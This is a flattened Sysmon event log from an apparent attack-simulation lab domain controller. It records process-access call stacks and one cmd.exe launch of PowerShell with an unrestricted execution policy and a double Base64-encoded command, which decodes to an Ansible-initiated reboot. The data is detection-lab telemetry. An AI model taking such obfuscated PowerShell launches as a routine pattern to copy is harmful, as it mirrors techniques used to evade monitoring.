10:39:18.437{733EE690-3DD6-5F80-0803-000000007E01}39323388C:\Windows\system32\conhost.exe{733EE690-3DD6-5F80-0C03-000000007E01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000509Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000508Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000507Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000506Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000505Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000504Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000503Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000502Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000501Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000500Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-0C03-000000007E01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000499Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000498Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000497Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3DD6-5F80-0B03-000000007E01}43645064C:\Windows\system32\cmd.exe{733EE690-3DD6-5F80-0C03-000000007E01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000496Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.438{733EE690-3DD6-5F80-0C03-000000007E01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD6-5F80-A6AA-110000000000}0x11aaa60HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3DD6-5F80-0B03-000000007E01}4364C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000495Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.437{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000494Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3DD6-5F80-0803-000000007E01}39323388C:\Windows\system32\conhost.exe{733EE690-3DD6-5F80-0B03-000000007E01}4364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000493Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000492Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000491Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000490Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.421{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000489Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 